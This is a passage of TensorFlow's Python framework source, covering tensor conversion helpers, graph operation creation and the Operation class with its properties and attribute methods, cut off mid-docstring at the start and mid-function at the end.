value_2 = my_func([[1.0, 2.0], [3.0, 4.0]])
value_3 = my_func(np.array([[1.0, 2.0], [3.0, 4.0]], dtype=np.float32))
```
This function can be useful when composing a new operation in Python
(such as `my_func` in the example above). All standard Python op
constructors apply this function to each of their Tensor-valued
inputs, which allows those ops to accept numpy arrays, Python lists,
and scalars in addition to `Tensor` objects.
Note: This function diverges from default Numpy behavior for `float` and
`string` types when `None` is present in a Python list or scalar. Rather
than silently converting `None` values, an error will be thrown.
Args:
value: An object whose type has a registered `Tensor` conversion function.
dtype: Optional element type for the returned tensor. If missing, the type
is inferred from the type of `value`.
dtype_hint: Optional element type for the returned tensor, used when dtype
is None. In some cases, a caller may not have a dtype in mind when
converting to a tensor, so dtype_hint can be used as a soft preference.
If the conversion to `dtype_hint` is not possible, this argument has no
effect.
name: Optional name to use if a new `Tensor` is created.
Returns:
A `Tensor` based on `value`.
Raises:
TypeError: If no conversion function is registered for `value` to `dtype`.
RuntimeError: If a registered conversion function returns an invalid value.
ValueError: If the `value` is a tensor not of given `dtype` in graph mode.
"""
return internal_convert_to_tensor(
value=value,
dtype=dtype,
name=name,
preferred_dtype=dtype_hint,
as_ref=False)
def _error_prefix(name):
return "" if name is None else "%s: " % name
def internal_convert_to_tensor(value,
dtype=None,
name=None,
as_ref=False,
preferred_dtype=None,
ctx=None,
accepted_result_types=(Tensor,)):
"""Implementation of the public convert_to_tensor."""
if isinstance(value, EagerTensor):
if ctx is None:
ctx = context.context()
if not ctx.executing_eagerly():
graph = get_default_graph()
if not graph.building_function:
raise RuntimeError("Attempting to capture an EagerTensor without "
"building a function.")
return graph.capture(value, name=name)
if dtype is not None:
dtype = dtypes.as_dtype(dtype)
if isinstance(value, Tensor):
if dtype is not None and not dtype.is_compatible_with(value.dtype):
raise ValueError(
"Tensor conversion requested dtype %s for Tensor with dtype %s: %r" %
(dtype.name, value.dtype.name, value))
return value
if preferred_dtype is not None:
preferred_dtype = dtypes.as_dtype(preferred_dtype)
for base_type, conversion_func in tensor_conversion_registry.get(type(value)):
# If dtype is None but preferred_dtype is not None, we try to
# cast to preferred_dtype first.
ret = None
if dtype is None and preferred_dtype is not None:
try:
ret = conversion_func(
value, dtype=preferred_dtype, name=name, as_ref=as_ref)
except (TypeError, ValueError):
# Could not coerce the conversion to use the preferred dtype.
pass
else:
if (ret is not NotImplemented and
ret.dtype.base_dtype != preferred_dtype.base_dtype):
raise TypeError("convert_to_tensor did not convert to "
"the preferred dtype: %s vs %s " %
(ret.dtype.base_dtype, preferred_dtype.base_dtype))
if ret is None:
ret = conversion_func(value, dtype=dtype, name=name, as_ref=as_ref)
if ret is NotImplemented:
continue
if not isinstance(ret, accepted_result_types):
raise RuntimeError(
"%sConversion function %r for type %s returned non-Tensor: %r" %
(_error_prefix(name), conversion_func, base_type, ret))
if dtype and not dtype.is_compatible_with(ret.dtype):
raise RuntimeError(
"%sConversion function %r for type %s returned incompatible "
"dtype: requested = %s, actual = %s" %
(_error_prefix(name), conversion_func, base_type, dtype.name,
ret.dtype.name))
return ret
raise TypeError("%sCannot convert %r with type %s to Tensor: "
"no conversion function registered." %
(_error_prefix(name), value, type(value)))
def internal_convert_n_to_tensor(values,
dtype=None,
name=None,
as_ref=False,
preferred_dtype=None,
ctx=None):
"""Converts `values` to a list of `Tensor` objects.
Args:
values: A list of objects that can be consumed by `tf.convert_to_tensor()`.
dtype: (Optional.) The required `DType` of the returned `Tensor` objects.
name: (Optional.) A name prefix to used when a new `Tensor` is created, in
which case element `i` will be given the name `name + '_' + i`.
as_ref: True if the caller wants the results as ref tensors.
preferred_dtype: Optional element type for the returned tensors, used when
dtype is None. In some cases, a caller may not have a dtype in mind when
converting to a tensor, so preferred_dtype can be used as a soft
preference. If the conversion to `preferred_dtype` is not possible, this
argument has no effect.
ctx: The value of context.context().
Returns:
A list of `Tensor` and/or `IndexedSlices` objects.
Raises:
TypeError: If no conversion function is registered for an element in
`values`.
RuntimeError: If a registered conversion function returns an invalid
value.
"""
if not isinstance(values, collections_abc.Sequence):
raise TypeError("values must be a sequence.")
ret = []
if ctx is None:
ctx = context.context()
for i, value in enumerate(values):
n = None if name is None else "%s_%d" % (name, i)
ret.append(
internal_convert_to_tensor(
value,
dtype=dtype,
name=n,
as_ref=as_ref,
preferred_dtype=preferred_dtype,
ctx=ctx))
return ret
def convert_n_to_tensor(values, dtype=None, name=None, preferred_dtype=None):
"""Converts `values` to a list of `Tensor` objects.
Args:
values: A list of objects that can be consumed by `tf.convert_to_tensor()`.
dtype: (Optional.) The required `DType` of the returned `Tensor` objects.
name: (Optional.) A name prefix to used when a new `Tensor` is created, in
which case element `i` will be given the name `name + '_' + i`.
preferred_dtype: Optional element type for the returned tensors, used when
dtype is None. In some cases, a caller may not have a dtype in mind when
converting to a tensor, so preferred_dtype can be used as a soft
preference. If the conversion to `preferred_dtype` is not possible, this
argument has no effect.
Returns:
A list of `Tensor` and/or `IndexedSlices` objects.
Raises:
TypeError: If no conversion function is registered for an element in
`values`.
RuntimeError: If a registered conversion function returns an invalid
value.
"""
return internal_convert_n_to_tensor(
values=values,
dtype=dtype,
name=name,
preferred_dtype=preferred_dtype,
as_ref=False)
def convert_to_tensor_or_composite(value, dtype=None, name=None):
"""Converts the given object to a `Tensor` or `CompositeTensor`.
If `value` is a `CompositeTensor` it is returned unmodified. Otherwise, it
is converted to a `Tensor` using `convert_to_tensor()`.
Args:
value: A `CompositeTensor` or an object that can be consumed by
`convert_to_tensor()`.
dtype: (Optional.) The required `DType` of the returned `Tensor` or
`CompositeTensor`.
name: (Optional.) A name to use if a new `Tensor` is created.
Returns:
A `Tensor` or `CompositeTensor`, based on `value`.
Raises:
ValueError: If `dtype` does not match the element type of `value`.
"""
return internal_convert_to_tensor_or_composite(
value=value, dtype=dtype, name=name, as_ref=False)
def internal_convert_to_tensor_or_composite(value,
dtype=None,
name=None,
as_ref=False):
"""Converts the given object to a `Tensor` or `CompositeTensor`.
If `value` is a `CompositeTensor` it is returned unmodified. Otherwise, it
is converted to a `Tensor` using `convert_to_tensor()`.
Args:
value: A `CompositeTensor`, or an object that can be consumed by
`convert_to_tensor()`.
dtype: (Optional.) The required `DType` of the returned `Tensor` or
`CompositeTensor`.
name: (Optional.) A name to use if a new `Tensor` is created.
as_ref: True if the caller wants the results as ref tensors.
Returns:
A `Tensor` or `CompositeTensor`, based on `value`.
Raises:
ValueError: If `dtype` does not match the element type of `value`.
"""
if isinstance(value, composite_tensor.CompositeTensor):
value_dtype = getattr(value, "dtype", None)
if dtype and not dtypes.as_dtype(dtype).is_compatible_with(value_dtype):
raise ValueError(
"Tensor conversion requested dtype %s for Tensor with dtype %s: %r" %
(dtypes.as_dtype(dtype).name, value.dtype.name, str(value)))
return value
else:
return internal_convert_to_tensor(
value,
dtype=dtype,
name=name,
as_ref=as_ref,
accepted_result_types=(Tensor, composite_tensor.CompositeTensor))
def internal_convert_n_to_tensor_or_composite(values,
dtype=None,
name=None,
as_ref=False):
"""Converts `values` to a list of `Tensor` or `CompositeTensor` objects.
Any `CompositeTensor` objects in `values` are returned unmodified.
Args:
values: A list of `None`, `CompositeTensor`, or objects that can be consumed
by `convert_to_tensor()`.
dtype: (Optional.) The required `DType` of the returned `Tensor`s or
`CompositeTensor`s.
name: (Optional.) A name prefix to used when a new `Tensor` is created, in
which case element `i` will be given the name `name + '_' + i`.
as_ref: True if the caller wants the results as ref tensors.
Returns:
A list of `Tensor`, `CompositeTensor`, and/or `None` objects.
Raises:
TypeError: If no conversion function is registered for an element in
`values`.
RuntimeError: If a registered conversion function returns an invalid
value.
"""
if not isinstance(values, collections_abc.Sequence):
raise TypeError("values must be a sequence.")
ret = []
for i, value in enumerate(values):
if value is None:
ret.append(value)
else:
n = None if name is None else "%s_%d" % (name, i)
ret.append(
internal_convert_to_tensor_or_composite(
value, dtype=dtype, name=n, as_ref=as_ref))
return ret
def convert_n_to_tensor_or_composite(values, dtype=None, name=None):
"""Converts `values` to a list of `Output` or `CompositeTensor` objects.
Any `CompositeTensor` objects in `values` are returned unmodified.
Args:
values: A list of `None`, `CompositeTensor``, or objects that can be
consumed by `convert_to_tensor()`.
dtype: (Optional.) The required `DType` of the returned `Tensor`s or
`CompositeTensor`s.
name: (Optional.) A name prefix to used when a new `Tensor` is created, in
which case element `i` will be given the name `name + '_' + i`.
Returns:
A list of `Tensor` and/or `CompositeTensor` objects.
Raises:
TypeError: If no conversion function is registered for an element in
`values`.
RuntimeError: If a registered conversion function returns an invalid
value.
"""
return internal_convert_n_to_tensor_or_composite(
values=values, dtype=dtype, name=name, as_ref=False)
def _device_string(dev_spec):
if pydev.is_device_spec(dev_spec):
return dev_spec.to_string()
else:
return dev_spec
def _NodeDef(op_type, name, attrs=None):
"""Create a NodeDef proto.
Args:
op_type: Value for the "op" attribute of the NodeDef proto.
name: Value for the "name" attribute of the NodeDef proto.
attrs: Dictionary where the key is the attribute name (a string)
and the value is the respective "attr" attribute of the NodeDef proto (an
AttrValue).
Returns:
A node_def_pb2.NodeDef protocol buffer.
"""
node_def = node_def_pb2.NodeDef(op=compat.as_bytes(op_type),
name=compat.as_bytes(name))
if attrs:
for k, v in six.iteritems(attrs):
node_def.attr[k].CopyFrom(v)
return node_def
# Copied from core/framework/node_def_util.cc
# TODO(mrry,josh11b): Consolidate this validation in C++ code.
_VALID_OP_NAME_REGEX = re.compile("^[A-Za-z0-9.][A-Za-z0-9_.\\-/]*$")
_VALID_SCOPE_NAME_REGEX = re.compile("^[A-Za-z0-9_.\\-/]*$")
def _create_c_op(graph, node_def, inputs, control_inputs):
"""Creates a TF_Operation.
Args:
graph: a `Graph`.
node_def: `node_def_pb2.NodeDef` for the operation to create.
inputs: A list of `Tensor`s (corresponding to scalar inputs) and lists of
`Tensor`s (corresponding to sequence inputs, e.g. "int64 * N",
"list(int64)"). The length of the list should be equal to the number of
inputs specified by this operation's op def.
control_inputs: A list of `Operation`s to set as control dependencies.
Returns:
A wrapped TF_Operation*.
"""
# pylint: disable=protected-access
op_desc = c_api.TF_NewOperation(graph._c_graph, compat.as_str(node_def.op),
compat.as_str(node_def.name))
if node_def.device:
c_api.TF_SetDevice(op_desc, compat.as_str(node_def.device))
# Add inputs
for op_input in inputs:
if isinstance(op_input, (list, tuple)):
c_api.TF_AddInputList(op_desc, [t._as_tf_output() for t in op_input])
else:
c_api.TF_AddInput(op_desc, op_input._as_tf_output())
# Add control inputs
for control_input in control_inputs:
c_api.TF_AddControlInput(op_desc, control_input._c_op)
# pylint: enable=protected-access
# Add attrs
for name, attr_value in node_def.attr.items():
serialized = attr_value.SerializeToString()
# TODO(skyewm): this creates and deletes a new TF_Status for every attr.
# It might be worth creating a convenient way to re-use the same status.
c_api.TF_SetAttrValueProto(op_desc, compat.as_str(name), serialized)
try:
c_op = c_api.TF_FinishOperation(op_desc)
except errors.InvalidArgumentError as e:
# Convert to ValueError for backwards compatibility.
raise ValueError(str(e))
return c_op
@tf_export("Operation")
class Operation(object):
"""Represents a graph node that performs computation on tensors.
An `Operation` is a node in a TensorFlow `Graph` that takes zero or
more `Tensor` objects as input, and produces zero or more `Tensor`
objects as output. Objects of type `Operation` are created by
calling a Python op constructor (such as
`tf.matmul`)
or `tf.Graph.create_op`.
For example `c = tf.matmul(a, b)` creates an `Operation` of type
"MatMul" that takes tensors `a` and `b` as input, and produces `c`
as output.
After the graph has been launched in a session, an `Operation` can
be executed by passing it to
`tf.Session.run`.
`op.run()` is a shortcut for calling
`tf.compat.v1.get_default_session().run(op)`.
"""
def __init__(self,
node_def,
g,
inputs=None,
output_types=None,
control_inputs=None,
input_types=None,
original_op=None,
op_def=None):
r"""Creates an `Operation`.
NOTE: This constructor validates the name of the `Operation` (passed
as `node_def.name`). Valid `Operation` names match the following
regular expression:
[A-Za-z0-9.][A-Za-z0-9_.\\-/]*
Args:
node_def: `node_def_pb2.NodeDef`. `NodeDef` for the `Operation`. Used for
attributes of `node_def_pb2.NodeDef`, typically `name`, `op`, and
`device`. The `input` attribute is irrelevant here as it will be
computed when generating the model.
g: `Graph`. The parent graph.
inputs: list of `Tensor` objects. The inputs to this `Operation`.
output_types: list of `DType` objects. List of the types of the `Tensors`
computed by this operation. The length of this list indicates the
number of output endpoints of the `Operation`.
control_inputs: list of operations or tensors from which to have a control
dependency.
input_types: List of `DType` objects representing the types of the tensors
accepted by the `Operation`. By default uses `[x.dtype.base_dtype for x
in inputs]`. Operations that expect reference-typed inputs must specify
these explicitly.
original_op: Optional. Used to associate the new `Operation` with an
existing `Operation` (for example, a replica with the op that was
replicated).
op_def: Optional. The `op_def_pb2.OpDef` proto that describes the op type
that this `Operation` represents.
Raises:
TypeError: if control inputs are not Operations or Tensors,
or if `node_def` is not a `NodeDef`,
or if `g` is not a `Graph`,
or if `inputs` are not tensors,
or if `inputs` and `input_types` are incompatible.
ValueError: if the `node_def` name is not valid.
"""
# For internal use only: `node_def` can be set to a TF_Operation to create
# an Operation for that op. This is useful for creating Operations for ops
# indirectly created by C API methods, e.g. the ops created by
# TF_ImportGraphDef. When `node_def` is a TF_Operation, all optional fields
# should be None.
if isinstance(node_def, node_def_pb2.NodeDef):
if node_def.ByteSize() >= (1 << 31) or node_def.ByteSize() < 0:
raise ValueError(
"Cannot create a tensor proto whose content is larger than 2GB.")
if not _VALID_OP_NAME_REGEX.match(node_def.name):
raise ValueError("'%s' is not a valid node name" % node_def.name)
c_op = None
elif type(node_def).__name__ == "SwigPyObject":
assert inputs is None
assert output_types is None
assert control_inputs is None
assert input_types is None
assert original_op is None
assert op_def is None
c_op = node_def
else:
raise TypeError("node_def needs to be a NodeDef: %s" % node_def)
if not isinstance(g, Graph):
raise TypeError("g needs to be a Graph: %s" % g)
self._graph = g
if inputs is None:
inputs = []
elif not isinstance(inputs, list):
raise TypeError("inputs needs to be a list of Tensors: %s" % inputs)
for a in inputs:
if not isinstance(a, Tensor):
raise TypeError("input needs to be a Tensor: %s" % a)
if input_types is None:
input_types = [i.dtype.base_dtype for i in inputs]
else:
if not all(
x.is_compatible_with(i.dtype) for i, x in zip(inputs, input_types)):
raise TypeError("In op '%s', input types (%s) are not compatible "
"with expected types (%s)" %
(node_def.name, [i.dtype for i in inputs], input_types))
# Build the list of control inputs.
control_input_ops = []
if control_inputs:
for c in control_inputs:
control_op = None
if isinstance(c, Operation):
control_op = c
elif isinstance(c, (Tensor, IndexedSlices)):
control_op = c.op
else:
raise TypeError("Control input must be an Operation, "
"a Tensor, or IndexedSlices: %s" % c)
control_input_ops.append(control_op)
# This will be set by self.inputs.
self._inputs_val = None
# pylint: disable=protected-access
self._id_value = self._graph._next_id()
self._original_op = original_op
self._traceback = tf_stack.extract_stack()
# List of _UserDevSpecs holding code location of device context manager
# invocations and the users original argument to them.
self._device_code_locations = None
# Dict mapping op name to file and line information for op colocation
# context managers.
self._colocation_code_locations = None
self._control_flow_context = self.graph._get_control_flow_context()
# Initialize self._c_op.
if c_op:
self._c_op = c_op
op_def = g._get_op_def(c_api.TF_OperationOpType(c_op))
name = self.name
else:
if op_def is None:
op_def = self._graph._get_op_def(node_def.op)
# TODO(skyewm): op_def_library.apply_op() flattens the incoming inputs.
# Refactor so we don't have to do this here.
grouped_inputs = self._reconstruct_sequence_inputs(
op_def, inputs, node_def.attr)
self._c_op = _create_c_op(self._graph, node_def, grouped_inputs,
control_input_ops)
name = compat.as_str(node_def.name)
# pylint: enable=protected-access
self._is_stateful = op_def.is_stateful
# Initialize self._outputs.
num_outputs = c_api.TF_OperationNumOutputs(self._c_op)
self._outputs = []
for i in range(num_outputs):
tf_output = c_api_util.tf_output(self._c_op, i)
output_type = c_api.TF_OperationOutputType(tf_output)
tensor = Tensor._create_with_tf_output(self, i, output_type, tf_output) # pylint: disable=protected-access
self._outputs.append(tensor)
self._graph._add_op(self, self._id_value, name) # pylint: disable=protected-access
if not c_op:
self._control_flow_post_processing()
def _control_flow_post_processing(self):
"""Add this op to its control flow context.
This may add new ops and change this op's inputs. self.inputs must be
available before calling this method.
"""
for input_tensor in self.inputs:
control_flow_util.CheckInputFromValidContext(self, input_tensor.op)
if self._control_flow_context is not None:
self._control_flow_context.AddOp(self)
def _reconstruct_sequence_inputs(self, op_def, inputs, attrs):
"""Regroups a flat list of input tensors into scalar and sequence inputs.
Args:
op_def: The `op_def_pb2.OpDef` (for knowing the input types)
inputs: a list of input `Tensor`s to the op.
attrs: mapping from attr name to `attr_value_pb2.AttrValue` (these define
how long each sequence is)
Returns:
A list of `Tensor`s (corresponding to scalar inputs) and lists of
`Tensor`s (corresponding to sequence inputs).
"""
grouped_inputs = []
i = 0
for input_arg in op_def.input_arg:
if input_arg.number_attr:
input_len = attrs[input_arg.number_attr].i
is_sequence = True
elif input_arg.type_list_attr:
input_len = len(attrs[input_arg.type_list_attr].list.type)
is_sequence = True
else:
input_len = 1
is_sequence = False
if is_sequence:
grouped_inputs.append(inputs[i:i + input_len])
else:
grouped_inputs.append(inputs[i])
i += input_len
assert i == len(inputs)
return grouped_inputs
def colocation_groups(self):
"""Returns the list of colocation groups of the op."""
default_colocation_group = [compat.as_bytes("loc:@%s" % self.name)]
try:
class_attr = self.get_attr("_class")
except ValueError:
# This op has no explicit colocation group, so it is itself its
# own root of a colocation group.
return default_colocation_group
attr_groups = [
class_name for class_name in class_attr
if class_name.startswith(b"loc:@")
]
# If there are no colocation groups in the explicit _class field,
# return the default colocation group.
return attr_groups if attr_groups else default_colocation_group
def values(self):
"""DEPRECATED: Use outputs."""
return tuple(self.outputs)
def _get_control_flow_context(self):
"""Returns the control flow context of this op.
Returns:
A context object.
"""
return self._control_flow_context
def _set_control_flow_context(self, ctx):
"""Sets the current control flow context of this op.
Args:
ctx: a context object.
"""
self._control_flow_context = ctx
@property
def name(self):
"""The full name of this operation."""
return c_api.TF_OperationName(self._c_op)
@property
def _id(self):
"""The unique integer id of this operation."""
return self._id_value
@property
def device(self):
"""The name of the device to which this op has been assigned, if any.
Returns:
The string name of the device to which this op has been
assigned, or an empty string if it has not been assigned to a
device.
"""
return c_api.TF_OperationDevice(self._c_op)
@property
def _device_assignments(self):
"""Code locations for device context managers active at op creation.
This property will return a list of traceable_stack.TraceableObject
instances where .obj is a string representing the assigned device
(or information about the function that would be applied to this op
to compute the desired device) and the filename and lineno members
record the location of the relevant device context manager.
For example, suppose file_a contained these lines:
file_a.py:
15: with tf.device('/gpu:0'):
16: node_b = tf.constant(4, name='NODE_B')
Then a TraceableObject t_obj representing the device context manager
would have these member values:
t_obj.obj -> '/gpu:0'
t_obj.filename = 'file_a.py'
t_obj.lineno = 15
and node_b.op._device_assignments would return the list [t_obj].
Returns:
[str: traceable_stack.TraceableObject, ...] as per this method's
description, above.
"""
return self._device_code_locations or []
@property
def _colocation_dict(self):
"""Code locations for colocation context managers active at op creation.
This property will return a dictionary for which the keys are nodes with
which this Operation is colocated, and for which the values are
traceable_stack.TraceableObject instances. The TraceableObject instances
record the location of the relevant colocation context manager but have the
"obj" field set to None to prevent leaking private data.
For example, suppose file_a contained these lines:
file_a.py:
14: node_a = tf.constant(3, name='NODE_A')
15: with tf.compat.v1.colocate_with(node_a):
16: node_b = tf.constant(4, name='NODE_B')
Then a TraceableObject t_obj representing the colocation context manager
would have these member values:
t_obj.obj -> None
t_obj.filename = 'file_a.py'
t_obj.lineno = 15
and node_b.op._colocation_dict would return the dictionary
{ 'NODE_A': t_obj }
Returns:
{str: traceable_stack.TraceableObject} as per this method's description,
above.
"""
locations_dict = self._colocation_code_locations or {}
return locations_dict.copy()
@property
def _output_types(self):
"""List this operation's output types.
Returns:
List of the types of the Tensors computed by this operation.
Each element in the list is an integer whose value is one of
the TF_DataType enums defined in c_api.h
The length of this list indicates the number of output endpoints
of the operation.
"""
num_outputs = c_api.TF_OperationNumOutputs(self._c_op)
output_types = [
c_api.TF_OperationOutputType(self._tf_output(i))
for i in xrange(num_outputs)
]
# In all the tests we have output_types that are passed into
# Operation.__init__ are a list of ints (which is illegal according
# to the docstring), but input_types are instances of DType.
# This extra assert is to catch if we ever use DType for output_types.
if output_types:
assert isinstance(output_types[0], int)
return output_types
def _tf_output(self, output_idx):
"""Create and return a new TF_Output for output_idx'th output of this op."""
tf_output = c_api.TF_Output()
tf_output.oper = self._c_op
tf_output.index = output_idx
return tf_output
def _tf_input(self, input_idx):
"""Create and return a new TF_Input for input_idx'th input of this op."""
tf_input = c_api.TF_Input()
tf_input.oper = self._c_op
tf_input.index = input_idx
return tf_input
def _set_device(self, device): # pylint: disable=redefined-outer-name
"""Set the device of this operation.
Args:
device: string or device.. The device to set.
"""
self._set_device_from_string(compat.as_str(_device_string(device)))
def _set_device_from_string(self, device_str):
"""Fast path to set device if the type is known to be a string.
This function is called frequently enough during graph construction that
there are non-trivial performance gains if the caller can guarantee that
the specified device is already a string.
Args:
device_str: A string specifying where to place this op.
"""
c_api.SetRequestedDevice(
self._graph._c_graph, # pylint: disable=protected-access
self._c_op, # pylint: disable=protected-access
device_str)
def _update_input(self, index, tensor):
"""Update the input to this operation at the given index.
NOTE: This is for TF internal use only. Please don't use it.
Args:
index: the index of the input to update.
tensor: the Tensor to be used as the input at the given index.
Raises:
TypeError: if tensor is not a Tensor,
or if input tensor type is not convertible to dtype.
ValueError: if the Tensor is from a different graph.
"""
if not isinstance(tensor, Tensor):
raise TypeError("tensor must be a Tensor: %s" % tensor)
_assert_same_graph(self, tensor)
# Reset cached inputs.
self._inputs_val = None
c_api.UpdateEdge(
self._graph._c_graph, # pylint: disable=protected-access
tensor._as_tf_output(), # pylint: disable=protected-access
self._tf_input(index))
def _add_while_inputs(self, tensors):
"""See AddWhileInputHack in python_api.h.
NOTE: This is for TF internal use only. Please don't use it.
Args:
tensors: list of Tensors
Raises:
TypeError: if tensor is not a Tensor,
or if input tensor type is not convertible to dtype.
ValueError: if the Tensor is from a different graph.
"""
for tensor in tensors:
if not isinstance(tensor, Tensor):
raise TypeError("tensor must be a Tensor: %s" % tensor)
_assert_same_graph(self, tensor)
# Reset cached inputs.
self._inputs_val = None
c_api.AddWhileInputHack(
self._graph._c_graph, # pylint: disable=protected-access
tensor._as_tf_output(), # pylint: disable=protected-access
self._c_op)
def _add_control_inputs(self, ops):
"""Add a list of new control inputs to this operation.
Args:
ops: the list of Operations to add as control input.
Raises:
TypeError: if ops is not a list of Operations.
ValueError: if any op in ops is from a different graph.
"""
for op in ops:
if not isinstance(op, Operation):
raise TypeError("op must be an Operation: %s" % op)
c_api.AddControlInput(self._graph._c_graph, self._c_op, op._c_op) # pylint: disable=protected-access
def _add_control_input(self, op):
"""Add a new control input to this operation.
Args:
op: the Operation to add as control input.
Raises:
TypeError: if op is not an Operation.
ValueError: if op is from a different graph.
"""
if not isinstance(op, Operation):
raise TypeError("op must be an Operation: %s" % op)
c_api.AddControlInput(self._graph._c_graph, self._c_op, op._c_op) # pylint: disable=protected-access
def _remove_all_control_inputs(self):
"""Removes any control inputs to this operation."""
c_api.RemoveAllControlInputs(self._graph._c_graph, self._c_op) # pylint: disable=protected-access
def _add_outputs(self, types, shapes):
"""Adds new Tensors to self.outputs.
Note: this is generally unsafe to use. This is used in certain situations in
conjunction with _set_type_list_attr.
Arguments:
types: list of DTypes
shapes: list of TensorShapes
"""
assert len(types) == len(shapes)
orig_num_outputs = len(self.outputs)
for i in range(len(types)):
t = Tensor(self, orig_num_outputs + i, types[i])
self._outputs.append(t)
t.set_shape(shapes[i])
def __str__(self):
return str(self.node_def)
def __repr__(self):
return "<tf.Operation '%s' type=%s>" % (self.name, self.type)
@property
def outputs(self):
"""The list of `Tensor` objects representing the outputs of this op."""
return self._outputs
class _InputList(object):
"""Immutable input list wrapper."""
def __init__(self, inputs):
self._inputs = inputs
def __iter__(self):
return iter(self._inputs)
def __len__(self):
return len(self._inputs)
def __bool__(self):
return bool(self._inputs)
# Python 3 wants __bool__, Python 2.7 wants __nonzero__
__nonzero__ = __bool__
def __getitem__(self, i):
return self._inputs[i]
@property
def inputs(self):
"""The list of `Tensor` objects representing the data inputs of this op."""
if self._inputs_val is None:
tf_outputs = c_api.GetOperationInputs(self._c_op)
# pylint: disable=protected-access
retval = [
self.graph._get_tensor_by_tf_output(tf_output)
for tf_output in tf_outputs
]
# pylint: enable=protected-access
self._inputs_val = Operation._InputList(retval)
return self._inputs_val
@property
def _inputs(self):
logging.warning("Operation._inputs is private, use Operation.inputs "
"instead. Operation._inputs will eventually be removed.")
return self.inputs
@_inputs.setter
def _inputs(self, value):
raise ValueError("Cannot assign _inputs")
@property
def _input_types(self):
num_inputs = c_api.TF_OperationNumInputs(self._c_op)
input_types = [
dtypes.as_dtype(c_api.TF_OperationInputType(self._tf_input(i)))
for i in xrange(num_inputs)
]
return input_types
@_input_types.setter
def _input_types(self, value):
raise ValueError("Cannot assign _input_types")
@property
def control_inputs(self):
"""The `Operation` objects on which this op has a control dependency.
Before this op is executed, TensorFlow will ensure that the
operations in `self.control_inputs` have finished executing. This
mechanism can be used to run ops sequentially for performance
reasons, or to ensure that the side effects of an op are observed
in the correct order.
Returns:
A list of `Operation` objects.
"""
control_c_ops = c_api.TF_OperationGetControlInputs_wrapper(self._c_op)
# pylint: disable=protected-access
return [
self.graph._get_operation_by_name_unsafe(c_api.TF_OperationName(c_op))
for c_op in control_c_ops
]
# pylint: enable=protected-access
@property
def _control_outputs(self):
"""The `Operation` objects which have a control dependency on this op.
Before any of the ops in self._control_outputs can execute tensorflow will
ensure self has finished executing.
Returns:
A list of `Operation` objects.
"""
control_c_ops = c_api.TF_OperationGetControlOutputs_wrapper(self._c_op)
# pylint: disable=protected-access
return [
self.graph._get_operation_by_name_unsafe(c_api.TF_OperationName(c_op))
for c_op in control_c_ops
]
# pylint: enable=protected-access
@property
def _control_inputs(self):
logging.warning("Operation._control_inputs is private, use "
"Operation.control_inputs instead. "
"Operation._control_inputs will eventually be removed.")
return self.control_inputs
@_control_inputs.setter
def _control_inputs(self, value):
logging.warning("Operation._control_inputs is private, use "
"Operation.control_inputs instead. "
"Operation._control_inputs will eventually be removed.")
# Copy value because it may be self._control_inputs_val (in particular if
# this is called from self._control_inputs += ...), and we don't want to
# clear value below.
value = copy.copy(value)
self._remove_all_control_inputs()
self._add_control_inputs(value)
@property
def type(self):
"""The type of the op (e.g. `"MatMul"`)."""
return c_api.TF_OperationOpType(self._c_op)
@property
def graph(self):
"""The `Graph` that contains this operation."""
return self._graph
@property
def node_def(self):
# pylint: disable=line-too-long
"""Returns the `NodeDef` representation of this operation.
Returns:
A
[`NodeDef`](https://www.tensorflow.org/code/tensorflow/core/framework/node_def.proto)
protocol buffer.
"""
# pylint: enable=line-too-long
with c_api_util.tf_buffer() as buf:
c_api.TF_OperationToNodeDef(self._c_op, buf)
data = c_api.TF_GetBuffer(buf)
node_def = node_def_pb2.NodeDef()
node_def.ParseFromString(compat.as_bytes(data))
return node_def
@property
def _node_def(self):
logging.warning("Operation._node_def is private, use Operation.node_def "
"instead. Operation._node_def will eventually be removed.")
return self.node_def
@property
def op_def(self):
# pylint: disable=line-too-long
"""Returns the `OpDef` proto that represents the type of this op.
Returns:
An
[`OpDef`](https://www.tensorflow.org/code/tensorflow/core/framework/op_def.proto)
protocol buffer.
"""
# pylint: enable=line-too-long
return self._graph._get_op_def(self.type)
@property
def _op_def(self):
logging.warning("Operation._op_def is private, use Operation.op_def "
"instead. Operation._op_def will eventually be removed.")
return self.op_def
@property
def traceback(self):
"""Returns the call stack from when this operation was constructed."""
return self._traceback
def _set_attr(self, attr_name, attr_value):
"""Private method used to set an attribute in the node_def."""
buf = c_api.TF_NewBufferFromString(
compat.as_bytes(attr_value.SerializeToString()))
try:
# pylint: disable=protected-access
c_api.SetAttr(self._graph._c_graph, self._c_op, attr_name, buf)
# pylint: enable=protected-access
finally:
c_api.TF_DeleteBuffer(buf)
def _set_func_attr(self, attr_name, func_name):
"""Private method used to set a function attribute in the node_def."""
func = attr_value_pb2.NameAttrList(name=func_name)
self._set_attr(attr_name, attr_value_pb2.AttrValue(func=func))
def _set_func_list_attr(self, attr_name, func_names):
"""Private method used to set a list(function) attribute in the node_def."""
funcs = [attr_value_pb2.NameAttrList(name=func_name)
for func_name in func_names]
funcs_list = attr_value_pb2.AttrValue.ListValue(func=funcs)
self._set_attr(attr_name, attr_value_pb2.AttrValue(list=funcs_list))
def _set_type_list_attr(self, attr_name, types):
"""Private method used to set a list(type) attribute in the node_def."""
if not types:
return
if isinstance(types[0], dtypes.DType):
types = [dt.as_datatype_enum for dt in types]
types_list = attr_value_pb2.AttrValue.ListValue(type=types)
self._set_attr(attr_name, attr_value_pb2.AttrValue(list=types_list))
def _set_shape_list_attr(self, attr_name, shapes):
"""Private method used to set a list(shape) attribute in the node_def."""
shapes = [s.as_proto() for s in shapes]
shapes_list = attr_value_pb2.AttrValue.ListValue(shape=shapes)
self._set_attr(attr_name, attr_value_pb2.AttrValue(list=shapes_list))
def _clear_attr(self, attr_name):
"""Private method used to clear an attribute in the node_def."""
# pylint: disable=protected-access
c_api.ClearAttr(self._graph._c_graph, self._c_op, attr_name)
# pylint: enable=protected-access
def get_attr(self, name):
"""Returns the value of the attr of this op with the given `name`.
Args:
name: The name of the attr to fetch.
Returns:
The value of the attr, as a Python object.
Raises:
ValueError: If this op does not have an attr with the given `name`.
"""
fields = ("s", "i", "f", "b", "type", "shape", "tensor", "func")
try:
with c_api_util.tf_buffer() as buf:
c_api.TF_OperationGetAttrValueProto(self._c_op, name, buf)
data = c_api.TF_GetBuffer(buf)
except errors.InvalidArgumentError as e:
# Convert to ValueError for backwards compatibility.
raise ValueError(str(e))
x = attr_value_pb2.AttrValue()
x.ParseFromString(data)
oneof_value = x.WhichOneof("value")
if oneof_value is None:
return []
if oneof_value == "list":
for f in fields:
